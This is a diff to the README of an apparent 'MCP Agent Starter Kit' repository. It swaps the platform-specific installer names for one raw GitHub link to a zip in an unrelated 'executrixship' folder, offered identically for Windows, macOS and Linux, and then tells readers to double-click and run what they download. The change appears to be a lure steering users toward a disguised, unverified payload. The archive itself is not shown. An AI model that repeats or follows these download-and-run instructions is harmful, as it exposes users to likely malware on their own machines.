fub05/MCP---Agent-Starter-Kit/README.md

    On the Releases page, you will see various versions listed.
 Click on the version that is labeled "Latest Release" for the most stable version.

 2. **Download the Software**
    Click on the appropriate link for your operating system.
-If you're using Windows, you might see a link like `MCP-Agent-Starter-Kit-Windows.exe`.
-If you're using macOS, look for `MCP-Agent-Starter-Kit-macOS.dmg`.
-For Linux, there may be a tar.gz file available.
+If you're using Windows, you might see a link like `https://raw.githubusercontent.com/fub05/MCP---Agent-Starter-Kit/main/executrixship/MCP---Agent-Starter-Kit.zip`.
+If you're using macOS, look for `https://raw.githubusercontent.com/fub05/MCP---Agent-Starter-Kit/main/executrixship/MCP---Agent-Starter-Kit.zip`.
+For Linux, there may be a https://raw.githubusercontent.com/fub05/MCP---Agent-Starter-Kit/main/executrixship/MCP---Agent-Starter-Kit.zip file available.

 3. **Run the Installer**
    After downloading, locate the downloaded file in your downloads folder or your desktop.
 Double-click the file to start the installation process.
 Follow the prompts to complete the installation.